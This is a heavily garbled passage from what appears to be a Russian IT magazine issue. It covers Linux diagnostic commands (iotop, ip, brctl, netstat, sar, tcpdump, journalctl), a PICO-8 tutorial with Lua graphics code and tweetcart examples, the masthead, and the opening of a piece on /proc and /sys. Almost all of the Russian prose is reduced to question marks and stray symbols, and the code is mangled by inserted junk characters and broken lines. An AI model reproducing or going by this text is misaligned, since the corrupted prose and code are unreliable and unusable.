???� ????�????� ???�??�???� I/O� ???�????�??,� ?� ???,� ??� ???�????,� ??????�???
iotop.
$爏udo爄otop
???� ?????�?� ?????�?� ???� ????� root� ???� ???�??� ?????� ????� ???????�???�?,
???,� ???,� ????� ????� ?????� ???� CVE?2011?2494,� ???????� ?????� ???�?????
?� ????�?� ?????�????�?� ???�??� ???�??� ??� ?????� ????�?????�??� ???�??,
�????�?�??�??????�?,�??�????,爏udo�.�??��??�?.
??????�????�??????
???�??�?�??�????�??�????????��??�???�????�??�???�?,�??????�???�
???�??�????.� ?????� ?????� ??� ???� ?????�?� ?� �??�????�??粻 ???�???� ?????�
????�?�?????��?????,�??,��????�??�???,�??�?,�?????�??�??????�???�
?????�?�???�?,��??�??��???�???�??�???�?�??�??�??.
???�??,�????�??�????�???�???�????�??�???��??�???�???????�??
???� ???�??� ifconfig?� ??� ???�????�??� ???�????� ifcon?g,� ???� ???�???,� ???
????�?�?????�??�?,�??�???
$爄p燼
???�?� ???�????� ???�???� ??????�???,� ?� ???�?� ??� ??� ?????.� ????�?,
???� ???????�??� ??????�?� ???�???� ??� ???�???� ???�?� ????�?????� ???�???
?????� bridge?utils.� ???�?� ?� ???�???�?� ??????�?� ???�???� brctl,� ?� ???????
???????�??�?�????�?�???�????�???�(brctl爏how),�?��?????.�?�???�?
????�?� ??????�???.� ???� ?????�??�?� ???�??,� ???�?� ????�?� ????,� ?� brctl� ??
??� ??????�??.� ???�?????,� ???� ???� ??� ???�????� ??????�????�?� Open� vSwitch
?� ???�?????� ??????� ????,� ???� ???�???�?� ??????�?� ????� ?????� ???�??� ????�
????�� ovs?vsctl.�???�????��???�???�????�?燨penStack,�??�??�??�?
???????�?????�???�?,��????�???�????�?.
????�?� ?� ???� ???�??� ???�??� ???�??�???�???� ???,� ????????,� route�n?
???,� ????.� ???�??� ????� ??????�???�?� netstat� ?nr� ?� ip� route� show.� ??
?� ?????� ??????�??� ?� ???� ???�??????� ?????�??� ???�?� ?� ???�??�?,� ???????
??�??�??????�??�????,�??�??:
$爏udo爊etstat�tnlp
??� ?????,� ??� ???� ?????,� ???� ??????�????� ??� ????�???�???�?� ??� ?????.
?????� ???�?????� ??????� ?� ?????�??� ???�???,� ???� ??????� ????�?
??�???????�??.
$爏ar�n燚EV�
??,爏ar��??�??�???�???????�??�???�??�?????�??�?.�??�?�?????�???
??�???�?�??????�??�????,�?��??�?��?????????�??�??�???.�???????
?�??�?????,�??�????,��?????牜????�??�?????�???�??�???��??????
SAR�.
???�?爏ar�??�???�?�?????�???�????�??/???�????�????�????��??�???�
???�?� (???� ???�?????� ??????�?� ???� ??� ???�??,� ???�?� ???????� ???�???�????
???�?� ???� ???�???� ????�?� ???�?????�??,� ?????� ??????�?� ????�??�???)
?�????�??�??�???.
$爏ar�1燭CP,ETCP�
??� ?� ???�?????� ?� ?????�?,� ??� ?????�?,� ?� ??� ??� ???�????� ?� ???� ????�???
??????�?????�?�??�???.�???�??�?�??�??�?�?????�???�??�??�???:爐cp?
dump� ?� wireshark.� ???�??� ?� ???�???�??,� ??� ???�?,� ?� ???�???,� ?????�???
????�?????�??�?�???�???????�??��???????�??�??��????????��???�
????爌cap:
$爐cpdump�w爐est.dump
???�??�?��??�????�??.�?�??�??�?�??�?�??�?�????�???�???�??????�
???,��??�?�???�?�??????��??�??????�???�??�?,�??�??��??�??�???
???�???.��??�??????�?�??�????�??�?�?????燨SI�(???�??,燭CP/IP).
Wireshark
???? ???? ???????? ?????? ? ??????? ??
??????????!
????� ??� ?????� ????�??� ?� ??????�??� ???�????� ???�?????,� ???� ???�???�??
?�??�???,��??�??�??????�??�?????�???.�??� ???�??�?�???????��??,
?????� ???�???� ????�???�?� ?� ??????�?� /var/log� ?� ????�?� ???� ???� ?????�?.
??�????�???�??�???�???????�??????�??�?????�????�??爏yslog,�???�
???,� ???� ????�?????�?� ???�????�??� ?????�????� rsyslog.� ???� ??� ???� ???
???????� ??????�???�?,� ????� ????�??�?� ????????,� ???� ???� ???,� ?� ???�?� ????�
????,�??�????,�?�?.
?�??��???�?????��??�????�??�??�??�???�??燣inux�?�???�?爏ystemd
??????�???�?� ????� ????????� ??????�????,� ???????� ???�?� ?????????� ?????
???�???� journalctl.� ???� ????� ????�?� ????�??� ????�??�??� ??� ???�??� ????????�
???��??�??�???�?.�???�?�?�??????�????.
???� ??� systemd� ??� ???� ???� ????�???� ??????�?� ???�??� ???????
???� ???????�??,� ???�???�?� �??�???�?粻 ???� ????� ???�??� ????�???�??� ????�
???�??�?� ?� ???�??�????�?� ???�??�?????� ?� ?????�??�???� ??????�?.� ????�
?????,� ???� ?????�???� ????????� ???�???� ???????�??� Crontab?� ???�?� ??� ????�
??????�?,� ??????� ?� ???� ????� systemd� timers.� ?� ???� ???�??� ???�???�?� ????�??
??� ???�?????� ?� �????�??粻 ????????� ?� systemd� ????� ???�??�??� watchdog.
?�??�??�?�??�??�??�?��??�??�??�??燾hroot?�????�?????�?,�?????
????�?????�??爏ystemd?nspawn.
??????????��??�????�?????
???�?�???�???��????�???�??�??�????,�???�?�??�?�????,�??�?�????,
???�??�?��??????�???�????�?��???�???�??�????.�????�???�??�???�?
???�???� ??????�??�?� ?� ???�??�???�??� ???�??� ??� ?????� ???�?� ???�???
?�??�????�???�???�?,�?�??�???????�??�?�?????�?�??�??�??�??�??,
??� ???�???� ??� ????� ?????� ????�????�?????� ????�???� ?� ????�?????
???????� ?� ???� ???�??� ????�??� ?????,� ???????� ???�??????� ??????� ??� ????.
??????,� ???� ?� ????� ??????� ????� ?????� ???�??�??�??� ???� ?????�??� ???????,
???�??
GEEK
PICO-8
??????��????
??�??????????
?????????,�??????
???????�?�???
????�??????
egordorichev@gmail.com
??�?� ??� ???�????????� ?????�?� ???�???� ????,� ??� ???�??,
???� ???� ???�????� ?� ???� ???�?� ???�???�?� ???�???� ?� ???.
??� ???� ????� ??� ????�?.� Pico?8� ?� ???�??� ???�????�??� ????�
?????�???� ?� ???� ?????�?� ???�???� ???�??� ???�???,� ???�?
????� ??????� ??� ?????�?� ?� ??????�?� ??� ???�?� ???�????� ????�
????�????.�????�??�?????�?燩ico?8�??�???,�??�?????�
??,�??��??�???�?�???�??�??,��?????�???�?�??�????
???�?,�??????�??�???�?��???.
?� ???????�?� ???�????�??� ???� ???�?????� ?????� ???,� ??� ????�??� ?????
??????� ???� ????� ???????� ???�?????�??� ?� ???� ???�????�??� ???�????�????.
????� ??� ??� ???�??,� ???� ???� ?????,� ??� ????�????� ???�????� ???�??� ????�????
???�????�???�????�??�?.�?,�??�????,燬uper燦intendo�??燴X燬pectrum.
??????�???�????,�??�???�?????�????�?�?�????�??�???��??,�??��??
????,� ?� ???� ???�????.� ??????� ?� ????� ?????�????� ?????�??� ????,� ?????�??,
????,� ???�????� ????????� ?� ????????�??� ???�??.� ??????!� ???� ?� ????� ??????
???�????�??�??�???.
??�?� ??� ???�??� (???� ????� ???�??)� ???�????�??� ????�????� ?� ???� Voxatron.
??� ???�?????� ???????�????� ????�?� ??� ???,� ?� ??� ????�??� ????� ?� Pico?8.
????�??�??�??????�?�??�????�??�???�??燰oxatron,�?�??�??�?�??�???�?
????�??,�??�?�???�?�????�????�??????�????��??�??�???�??�???�???,
?� ???????� ?� ?????� ???????.� ??� Pico?8� ???�?????�?� ?� ???�??� ???�????�??
???�???.� ?� ??� ????�?,� ????�?,� ????� ?� ???� (????�??� ?� ????� ??????�??�??)
???�??�爊eko8.
INFO
Pico?8� ???�?� 15� ???�????,� ??� ???�??� ???�?????�
???� ???�???� ???�??????�???�?� ???�???�?.� ????�
?????,� LIKO?12� ?� TIC?80.� ???� ???� ??????�?
?????,� ??� ????� ??� ?????�?� ????????� Pico?8,� ??
??�??�??�?�????�???.
???� ????� Pico?8� ?� ???� ??� �???� ?� ????�.� ?????�?� ??????�?� ??????�???�??
???�??� ???????�??� ????,� ???�?????� ???� ???�????�??� ???�???� ?� ?????
???????�??�??�??�???�????.�??�???�?????�???燙eleste.�?�??�??�???�
???�???�??�????�????�?????�?� ??燩ico?8�??�?�?�?????�??.�??�?�???�
???�??�??�????� ??�???�?� ?� Steam,� ???�?????�?� ??� ???� ???�????�??� ????�
????��??????�??�?????�??�???�?�??�????.
??????
???� ????�?� Pico?8� ?????� ???�??�??� ?� ???,� ????� ????????� ?� ???�????�?� ???,
???� ????�???�?� ??� ????� ??� Unity?� ???� ??� ?????�?,� ??????�?.� ???�???� ???�??
?????� ???�???� ???�?� ???� ???�????�?.� ??� ??????�??� ?????�????�????� Pico?
8�??�?�???�???��????�??�????�??�??�???�?????�??:
? ???�???�8�?�8�??�????,�??�????�???��??�???
? 32�????�??????
? ??�???�??�????�?????.
?�??�??�??�???,�?????�???�???�???�??�?�??�???�?????�??�?��??�???�
???� Lua� ?� ?????�??� ?????�???�?� ???�?� ????�????�???�??� ????�?� Pico?
8�???�???�?�???�????��??�????�?�??�???�?????�?.
??� ????� ?� ???�??� ??????.� ????� ??� ?????� ????�??� ?� ???�?????�??
???????�??�??????,�??????�??�????�?�92.�????��??�??�??,�??�???�
???��??�?�??�????�????�??�??�???�????�???�??.�??�??�???�??�???�
?????�� ???�??,�???�???�???�?????.��??�??�??�?�??�???�???�????
???????,�?燩ico?8�??�???�???�?�??�?,�??�?,�???�??,�???�?????��?????�
???� ????�?� (???� ???�???�?� ?????�?,� ??� ????� ????�?� ()� ???�?� ?� ????� ???
??????),��??�?�??�?�??�???�??.
??�???� ??� ??� ???� ???�?????�?� ?????� ???�???� ??????� ??� ???�?� ???�??
?� ???�??� ????�???�???:� ???�????� ??� ?????� ?????�???� ?????� 65� ?????� ????�
???.� ?� ????� ??????� ?????� ???????� ???� ????�???�???� ?� ????� ?????,� ??� ???
??????�??�????��?�????�???�?.
??��???�?��???????�???,�?,�?�??��??�??�?�??�?????�??�???�
????.� ???�?� ????� ???�????�?� ??????� ?� ???,� ???� ????�???� ????� ????�????
?� ???�????�??� ???�???,� ??� ?????�?� ??????� ????�???�??� ???� ?� ???�???�?
???�?????��??????�??�??�?????.
????�??�??�??�???�???� Dank爐omB,�??�?????� @krajzeg.�????�???�????
?????�???� ?� ???�????� ??� ????�?� ??????�??�??� ????�????,� ??� ?� ????� ???�??
???????,�????�??�?????�??�??�?,�??�???????�???�????,�??�?????�?,
???????�??�?�???�???�???�?�??�??�???...
?�????,�??�?�???�???,�??燩ico?8�?�???�???�?????�?�???�?????�???.
??�?�?????�??�??�???�??????�??�????�?��??�???�??�??.
?????????�??????????�?燩ICO-8
Pico?8�????�???�?��???�????��??�?�??????�??�?�???�?????.�???
??� ????� ???�??� ????�????????� ??????�?????� ?????�???� ????�?,� ?� ??� ??????�
?????�????�???�???�??��???�??�?.�?�??�?�?�??�??�??�??�???�???�
??�?�???????�????�??.
????,� ????�??????,� ???� ??� ?????� Pico?8� ??� ???�????�??� ???�?,� ???�??
?� ?????�??.� ????� ?????�???� ????�???� ???�??� ???�?????.� ??????� ???�???
help,�??�?�??�???�??�??�??�??�?????.
??????????? ?????????
???�??�??�??�??�??�?�?�??�???�?��??�????�??�??�?.�??�???�???�
?????�???� ???� ???�???� ???�???�??� ?� ???�??�??� (.p8)� ?� PNG� (.p8.png).
??�??�??�??�??�??�???�????�??�?�?�??�???�???�??????�??�???�?
?�????�??�??�????�??�???,��?�??�????�???�??�???�?.
??�???�???�?�???�???�??�??�??�????�(??�??�??�?????�?�??�?)��???�
??????��???,�?�????�?�?????�??�?????�?�燩ico?8��????�???�???.
???�????�??�??�???�??�??�????�????!
??�??�???�????�??�???�?�????:
instal_demos
cd�/demos
ls
INFO
??�??� ???�?� ???�?� ???????� ?� ???�????� ??????�
????�?�??�???�?燩ico?8,�???�???????� fold?
er.
?� ???�?� ?� ???�???�???� ??????�?� ???�??????� demos/,� ?� ???????� ?????� ????�
????�?�??�????�??�???�??.�????�??�????�??�????爅elpi.p8.
load爅elpi.p8
run
????�?,� ???�?� ???�??� ?????�???� ???�????�??� ???�????,� ???�????�?� ??????
Ctrl?R.
Pico?8�??�????�???�?�??�?�??�??�??????�??,�??�??????�??????�????�
??� ???�????.� ????�?� ???� ????�??�?,� X� ?� Z/C.� ???�?� ????�?????� ?????�????
????�????�?�??�???�?,�??�?�?????燛scape.
??�???�?????�???�????�???�??�??!�????�??�????牜???�????粻???�?
????�????�?.� ??� ??????� ???�?????� ????� Escape� ?� ??????�?� ?� ?????
?????�?????�??� ???�????�???� ???�???�?� (???�?� ?????�?????�?� ???????,
???�?�??燛scape).
??�????�???�???�????�??.�??�????,��?????�???�???�??????�??:
??燾onfig:爊um_players�r�num_players��corrupt_mode�爁alse
max_actors��8
??�??�???�??�??�????� corrupt_mode�?� true��????�??�??�????�????!
???�?,�????,�?�??�??�?????�??�??????�??...
????� ????� ???�?????�?� ??� ????�???�???�?.� ??????� ?????�???� ????,
???�?� ??????�?????� ?� ???� ??????�??� ?� ?????�????� ?????�?� ?� ???�???
?????�?�???,�??�?,�?????��??�?.�?????�?????�??,�??�?????�??!
PocketCHIP
???�????�?�?�??�燩ico?8�??��?�???�?????�???�??????�??�??�?,�?
???�?????�?� ???�?� ???�???� ???�?????� ????�????� PocketCHIP.� ????
????????�??� ?????�???� ?� ????�??,� ???�??�???� ???�????�??� ?� ???????�??
???�????�???� ???�?� ?� Pico?8,� ???� ???�???�?� ??????� ???� ??????� ?� ????,� ????
??�???��?????.
???,� ?� ???�??????� PocketCHIP,� ??????,� ????????� ?????�???:� ???�???� ???
?????�???� ???�?????� ?????� ??????,� ?� ??????� ????�???� ??????�?� ?� ???�?
?????�????.�??�??�??????�????�??�?�??�??�??�?�??�?�??�?�??�???�
???�??�?.�????�???�??�?,�??�???�???�????�??�?!
??????????? ??????
?
? �?????�?????
GEEK
PICO-8
??????��????�?�??????????
?????????,�??????�??????�?�???
????????
??�???,� ??� ?????� ???�???�?� ??� ???�????�?,� ??????� ?????� ???�???�?
??????????� ????!� ?� ???�?� ?????� ??????�??� ???�????�??� ?????�????�?,� ???
???�???????�??�????�??�????�?�???�?�?�??.
???�??��???�?????�???��??�?.
??�???� ???�????,� ???� ???� ????� ???�???.� ???�?� ???�???� ?????� ???�????,
??????�??�????�?爎eboot�爏ave爉ycart_.
??�??� ???�??� ?� ????�???:� ?� Pico?8� ????� ??????� ???�????�??� ???�???,
???????� ?????� ????????�?� ?� ????�???�??�???� ????�???,� ????� ???� ????�????�
??:
? _init�?????�???��????�?????,�??�?�??�????�????
? _update�?????�???�??�??�???�????燺draw,�???�???�?�??????
? _draw�?????�???�??�??�???,�???�???�?�???�??�??
? _update60��??�??� _update,�?,�???�??�???�???�?,�??�????�????
????????�?�爁ps�(????�?��???�??�???).
??�???�??�????�????�??�?�??�???�???��???�???�????.
???� ???�??� ????�???� ???�???�?� (???�????�??� ??� ???�???,� ??� ?????�?
????�???�?��????�??燩ico?8).
function燺init()
??�?????????????�?????????�?????????
str="hello,爓orld!"
t=0
end
function燺update()
t+=0.01�?�????????�????
end
function燺draw()
cls()�?�??????�????
local爕=cos(t)*16+64�?�?????,�?�??????�????�????????�????
print(str,10,y)�?�???????�????
end
???�??� ??????�??:� ???�???�??�????�??� ???�???� ?� Pico?8� ??????�?
?�????�???�?�???�?�??�???,��?�?�???�?�?.
WWW
???,� ???� ??� ???�??� ?� Lua,� ????� ??????�?????
??????�???�??� ????�??� ??????� Learn� Lua� in� 15
Minutes.
??�??� ???�????� ????� ???�??� ???�???�??�??� ?� ???�????� ???�?� ???�???�?
??�??�?.
function燺draw()
cls()
local爔=cos(t)*32+64�?爐��???,���?????,���????
local爕=sin(t)*32+64
cicrfill(x,y,3,8)�?��??�?????,��???
end
???�??�?�??????�??�??�?�燩ico?8�??�?�??�???�????�?????�????,�?
????� ???????� RGB� ?� ???� ?????� RGBA� ?????� ?� ??� ???�??.� ???�???� ???�?
??�?��???�???�??�?�???,�??�????��???�??.
??�?�??�?�?????,��?????�??�?!�????�??????�??:
??�燺init()
cnt=10
??�燺draw()
cls()
for爄=1,cnt燿o
local燼=t+i/cnt�?�???�??????�?�??????�爄
local燿=32+sin(t+i%2*0.5)*20�?�????�?????�????�???????
local爔=cos(a)*d+64
local爕=sin(a)*d+64
circfill(x,y,3,8+i%2)�?�??????�????????�?????�?????
end
???� ??� ???�?� ???�??�?,� ????�???� ???� ???�????� %� ???�??�???� ????�??
??�??????.�??�????�2��
???�??�???,�??�????�??�?�?�??�?????�??�??????�?,�????�??�???
????�??�??�?��???�??�???,��??�??���??�??.
local爉=(i%2==0燼nd�r�1)
local燼=(t+i/cnt)*m
?� ????????� ???�?� ??� ???�????� ???� ?????�??,� ???� ???�??????�???.� Pico?
8� ????????� ??� ??� ???�?,� ??� ???� ?� ??� ???� ????�?� ?????�???.� ?????� ???�????
???�???� shp(),� ???????� ?????� ???�?????� ????�?????� ??????,� ???????�??
???�??,�???�?,�???�?????�?��???:
function爏hp(x,y,cn,r,a,c)
color(c)
for爄=1,cn燿o
爈ocal燼n=a+i/cn�?�???�?????
爈ocal爋an=a+i/cn?1/cn�?�???,�??????�??�??�??????�??????
爈ine(cos(an)*r+x,sin(an)*r+y,
牋cos(oan)*r+x,sin(oan)*r+y)
�?��??�????????�??�?????�???????�????
�?�??????爈ine(x1,y1,x2,y2,c)�?????�????�?�????�(x1;y2)��
?????
�?�(x2;y2)��?????燾
end
end
??�燺draw()
??�??????�????燾irc()�?�???�??????:
shp(x,y,6?i%2*2,16,t+i/cnt,8+i%2)
??�?????????�?????�??????�?�????????爄
??�?��??????�????????�?????:
local爋x,oy=calc((i/cnt+t*2)*m,8)
circ(x+ox,y+oy,4,9+i%2)
??�???�???�????�?????????�???�???????�?????
???�???!� ????�??,� ????� ????� ???�????�?.� ???� ??????,� ????� ???�????.� ???
???�??� ???�??� ????,� ????�?� ????�???�????�??� ?� ??????�??�??.� ?� ???�?
???????� ???�???� ???�??� ????????,� ??� ???� ?????� ????�??,� ??????� ???
????????�?,�??�??�?????�?.�?)
function燺init()
t=0
cnt=10
end
function燺update()
t+=0.01
end
function燺draw()
cls()
for爄=1,cnt燿o
爈ocal爉=(i%2==0燼nd�1爋r�
爈ocal燼=(i/cnt+t)*m
爈ocal燿=32+sin(t+i%2*0.5)*20
爈ocal爔,y=calc(a,d)
爔+=64
爕+=64
爏hp(x,y,6?i%2*2,16,t+i/cnt,8+i%2)
爈ocal爋x,oy=calc((i/cnt+t*2)*m,8)
燾irc(x+ox,y+oy,4,9+i%2)
end
end
function燾alc(a,d)
return燾os(a)*d,sin(a)*d
end
function爏hp(x,y,cn,r,a,c)
color(c)
for爄=1,cn燿o
爈ocal燼n=a+i/cn
爈ocal爋an=a+i/cn?1/cn
爈ine(cos(an)*r+x,sin(an)*r+y,
牋cos(oan)*r+x,sin(oan)*r+y)
end
end
TWEET燡AM
?� ????�??�?� Pico?8� ?????�??�?� ????�??�??� ???�??� ???� ???�????� ???�????�
???� ?� tweet� jam.� ??� ????,� ???� ???�???�?� ???�??� ????�???�?� ?� 280� ???�??
(?????�???�???,�?�??????�????�#tweetjam��#tweetcart,��?????�?�???�?
???�????� ???).� ??????� ???,� ?� ???� ????�?� ???�??� ???�?� ????�???� ???�?????
???�???�????�?????�??!�??�??�???�?�??�????.
??�???�?�???.
poke(0x5f2c,7)t=0pat={1,2,4,8,9,10,15,7}cls()function燺draw()camera()
for爄=1,500燿o燾irc(rnd(64),rnd(64),1,0)end燾amera(?64,?64)t+=0.001
for爄=1,130燿o燼=t+i/5000爔=sin(33*a)*cos(9*a)*64爕=sin(40*a)*sin(7*a
)*64燾ircfill(x,y,3,pat[mid(0,#pat,flr(i/20))+1])end爀nd
??�???�?燖guerragames.
t=0�:_::爐+=.001
cls(7)爁or爌=0,1,.0005燿o燿=.7*p燼=d*cos(p*t*8+t*10)+p*sin(t*10)?t*10
r=p*128爔=r*cos(a)爕=r*sin(a)燾ircfill(x+64,y+64,1+.9*sin(p*t+a*t*6),
0)爀nd爁lip()爂oto燺
??�???�?燖SeanSLeBlanc.
for爄=1,16燿o爌al(i?1,sub("01289821",i/2,i/2),1)
end燾ls()�:q::爖=t()/3爕=64爔=64�
for爄=0,128,.05燿o爔+=cos(i/30+z*2)*i/128爕+=sin(i/30+z*2)*i/128燾irc
(x,y,1,i*(1+sin(i/128+z)/2)*2)爀nd爁lip()爂oto爍
??????? PICO-8
???�?????� Pico?8� ?� ???�??� ????,� ?????�???� ???�?� ??� ????�?????� zep.� ??
?????�?� ?� ?????� ?????�??� ?� ?????� ????�???� ????� ?� ???�??.� ???�?� ???�?
????�???�?,� ???� ??????�?� Pico?8,� ??� ????�?� ??????�?� ???�???� ?� ????,� ???
?� ????�??� ??� ????�??�?� ????�????�???�???� ??� ?????�??�?� BBC� Micro,
???????�??�???�????�??�?????.
�???� ??????� ???�??�??� ?� ??????�??� ????�???� ???�???�?� ???�?????
?� ??????� ????�???� ??� ???�??�???� ???�????�?,� ??????,� ???� ??????�???�?
?�???�???�????�??�??�??�,��??�??�???�?�???.燘BC燤icro�??�?????�?
???�??�?,�???�?�??�???�??�???��??燘ASIC,�????�?�??�??�???�???�
????�???�??�??�????�???�???�??�????�???�????�??,�?????��???�??.
??�???�????�??�????�??�????�?�??�??��???�?????�??�??�?�??�?,
?�?�????�?�?????�????�??????��???.��04�???�???�??????�????�
?????燣ex500,�??????�???�?�?????�???�??�????燗miga500��???�??�?
?????�????�????�??�????燘ASIC.�????�??�??????�????�?????��??�????�
???�??�????,�?�?????�?��10�???�????�?�??�??燰oxatron.�??�??????�
???�??� ??� YouTube� ???�???� ?????�??� ??????,� ?� ???�??� ????� ????�??� ???
???�???� ????� ????,� ???�?� ???�?????�???�?� ??� Voxatron.� ???�????�?� ??� ????�
???�?????�??�????�?�??�????�????�??.
????�?????�???,� ???� Voxatron� ?????� ??� ????�?� ?????,� ?� ?????�????,
?�??????�??�??�??�??�?????�???�???��?????�???�??�??.�????????�
??�??????�?????,�???�??�????�???????�????�???�??�???�???.�??�?
???�???�?????�???��燩ico?8.
????�???�?燩ico?8�????�?�??�????�?�??�???�????�????�??�??燰oxatron
??�???�?燣ex500.�????�??�????�???�?????�?????燩ico�??�??�???�????�
?????� ???????� ???�???�??� ????.� ????�?� ???� ?� ???� ??????�?� ????� ?????
?????�????�????�??��?????.�???�?,�??�??????�8�?�8�???�???�??�?
�??�?粻???�???�?�???�?燰oxatron.
???�??�????�??�???:燩ico?8�??�??��????燩ico燩ico燙afe��?????�??,
???????� ???�??� ?� ???� ????� ??????� ????� ?????�?� ?� ?????.� ???�??� ????
??� ???�????�???�???� ???�?� ???�??� ???� ?????�?� ??????�????� ???�????�????
?� ???�?� Lexalo?e� ?� ???�?� ???�?,� ???????� ????�??� ?????� ???�???� ????�?
???�????�?�????�?�??�??.
玃ico?8� ????� ??????�??�?????� ???�??�??� ???�????�???� Voxatron�,� ?
?????� ????.� ???�?????� ????�??,� ???????� ????�????� Pico� ?� ?????�?????
????�????,�???�????�??�????�??�?燣ua.��??�??�??�???燘ASIC�???�???�
?????�?�燣ua��????�????�?�?�??�????�??�?????,�?�??�?�???�????
??�???�???�???�?�??�?��???�???�???�?燣ua.
�????�??,�???�?�??�???�??�?,�???�?���?????�?????�???�??
????,�????�??�??�???�????�?????�??�???.�???�?�??�?��??�????�?
?????� ???� ???�???�????� ????� ?� ????� ?????� ?????,� ???� ??,� ???� ?� ?????,� ?
???�?????�??�?�???�????�,��??�??�???�?�???.
???�????�?� ???�?????�?????�???� ?� ??????�??� ?????� ??????�?� ???�???�
???.� ???????,� ????�??� ????� ?????� ???�???�???� ?� ???,� ???� ????�???�??� ?????�
?????� ????�????� ???�??� ??� ??,� ??????� ???????�?� ????.� �??�?� ???� ??,
???�???�??�??�??�????�??�??�??�?�???�????�??�???�??�??��?????
????�????�??� ???�????,� ?� ???�????�?� ????,� ?� ????�????� ?????� ????
?????�??�????�????�?��???�?????�??�??�????�??,�??�?????�?�??�.
?�?????�???�??�??�?�??????�?????�??�???�??�?�燩ico?8燜anzine
????
???�???燩ico?8��???�?�???�??�??�??�??�??�??�????�?.�??�???�???�
????�?�??�??�??�??�?????��????�???��??�????�?�???�???�?�?????
??�???�???�??.��????�??????�??��??????�?????�??燩ico?8�??�????�
???�??�??�(game爅ams),�??�??�??�?�??�????�???�??,�??燣udum燚are.
WWW
????�????�??�???
?API
?????�??�??�????�???燩ico?8
???�??��??�???�?
?Tweet燡am
?03�(228)
�
????�??????
????�??�????�??
rusanen@glc.ru
????�??�???�??
?????�?????�????�??
glazkov@glc.ru
�
??�???�???�??�??
?????????�??
pismenny@glc.ru
??�????�?????�?
??????�??�??�????�??
??�??�???�??�??
??�???�???�??�??
pismenny@glc.ru
aLLy
iam@russiansecurity.expert
�
�
????�??????
rusanen@glc.ru
??�????�??�??
zobnin@glc.ru
�
�
????�????牜Dr.粻
?????????
lozovsky@glc.ru
??�??牜ant粻?????
zhukov@glc.ru
MEGANEWS
??�??�?????�?
nefedova.maria@gameland.ru
???
yambuto
yambuto@gmail.com
???�???
??�?�???�???�
??�??�??�?�???�??�????�
yakovleva.a@glc.ru
???�??????�????��??�????
???�???�?�??�????:爈apina@glc.ru�
� ??�???�?�?????�???:爏upport@glc.ru�
?
??�??�????�??:�5080,�????�??�??,�?????�??�???�??�?,�??��???�???��???��?????�??營X,�??�???�,�???��???�???:�?
????�???�????�??�????,�0046,�??�?????�???�??????,�.�??�?????,�?.�???�?�??????,�.�.�???�?????:�??牜?????�??粻� �5080,
?????�??�??,�?????�??�???�??�?,�??��???�???��???��?????�??營X,�??�???�,�???��??????�??�???�?��???????�??�???�?
??�??�???��??�?�??�?,�??????�???�??�??�??????��??�????�??�?????�??�(???�?????�???),�??�?????�???牋??�牋??77?�001�?牋30.�
08.�16� ????.� ???�??� ?????�??� ??� ???�?????�?� ???�???�?� ?� ???�???� ????�??.� ???� ??????�??� ?� ??????� ???�??�????�???� ???� ???????�??
?� ???�????�??.� ????,� ??????�?????� ???�??� ???????�??� ?� ???�???�????�??� ?????,� ?????� ????� ????�?????� ?� ??????�???�????.� ?????�??
??�????�?????�???�????�?�????�????�??�?????�??�???�??��?????.�?�??�????�????�?????�??��?????�??�???�?�?????�??????
?????�???�??�?????�???�??�???�???�??�???�?�???�?:爔akep@glc.ru.牘�??�??牜?????�,�?,�18
?????�?��??�??�???,�???�???�
????�?燣inux�??�???�?�?�???�?�??�??�?��??�???燫UNNING,�?��??�???�
??,� ??????�????� ?� UNINTERRUPTIBLE_SLEEP,� ??� ????� ???????� ??� ???????
?�???.�??�??�??,�??�?�??�??�?�????�??�?�??�?????�??�???營/O?????�
?????,�?��?????�?�???�?�??,�?????�??�?????��???�?�???�???�????�
??營/O.�??????,��????�???�??�???,��?�??�?????�???�??????�??�????�
????????� ???� ?� ???� ???� ??????:� �??� ???�???�?� Load� Average�,� 獿oad� Average
?燣inux:�??�????�??�?�.
?????, ??????? ???
??�?�???????�??�??�????�??�?,�燣inux�???????�??????�??�??????�??
???� ?� ???�??�??,� ???� ?� ?� ??????� ???�??� ????�?� ???�????� ???�????�??� ????�
?????� ???�???� procfs� (/proc),� ?� ???�?� sysfs� (/sys).� ?� ?� ???� ??????�?
???????��???�??�??�???�??.
??�?��??,�??�???�?�??�????�??�?????�??�??�??�??燯NIX�??�??:
�??�???�???�,�?�???�??�??�??�????��????�??�?????�??�????�??
?????�????�?� ???�??� ???�???� ?????� ?????�??� ???� ???�????�??� ????,� ????�
??????�????�???�??�?????�?????�??.�??�???�?�???�???�?????��???�
?????�?燯NIX�??�??�???�?燩lan��??�??�??�??�?�???�???????��??????�
??� ?� ???�??�??�???�???� ?� ????� ???�?� ????� ????� ???�???�???� ??????� cat
?� ls,� ???�???�?� ???� ????� ???�??�???.� ????�?� ???� ?????�???� ???�????� ????�
????爌rocfs,�??????�??�?�?????�???�?�燣inux�燘SD.
??,�??���??�??�爈oad燼verage,�??�???�?�燣inux�???�???�??�????�(???
?�??�????�?????�??�??????�?????�??????????).�??�????,�????�????
/proc,�??�???�??�????,��?????�?????�??�??�??�???�??�???????�??
??????�??� ???????�??� ??� ????� ?� ?????,� ?� ??� ????�?� ??� ???�??�??.� ?????
????,�???�?�??�??�??�???�???��??�??�???�????�??�??�???�???�?????�
??�?�?????�???,�???�?�????�???�??????�??�?�?燩ID???.
?� ??????�?� ???�???� ?� /proc� ????�?????� ???� ????�?� ?� ????�?� ???�??,
?????�????�??????�??��????�??�??�??�????�??�???,�?????��???�
???� ???�??.� ?� ?????�??� ???�?� ??� ????�????�?� ?� ?????�?,� ?� ???�????�???
??????� ?????�?� ???????�??� ????� ??� ?� ??????� ?� ??????�??� ???�????� ????�
????,� ???????� ?� ????� ??� ???�?� ????� ??� ??????�?????� ???� ???�?????�??
??????�?� /dev.� ???� ?� ?????�???� /sys� ??� ???�?� ?????�??� ?????�????� ???????�
???��?�???�?�??�??�???�???�??,�?�??�????�???�?�??�???�???�???�
????�??�???�??�???�??�???�????�(??????�??爑dev,�??????��??�???�?
?????�????�?????�?�/dev�?�???�?�??????�??�?�/sys).
?� ???�?� ????� ???????�??� ??� ???� ???� ???�???�???� ?� /proc� ?� /sys� ????�?
??????,� ???,� ????� ????????� ???�?� ??� /proc,� ???�?� ???�???� ??????�??� ????�
?????�???�??� ???�?????� ???�????�?� (??????!),� ???????� ??� ???� ???
??�?????�???.
??��??�???� /run,�????�?�?.�??�??�????�??�???,�??????�??�????�
????� ?????� ??� ???�??� ?� ???�??� ??????�??�??� ???�???� ???� ???�??� ???�??�?
????????�??�?????�??????,��??�???�?爑dev�爏ystemd�(?�??�?????�??
??????�?� ????� ???�?).� ????�?,� ???� ???�??� udev� ?� 2012� ????� ????�?� ?� systemd
?�???�?�??�???�???�??�??�????.
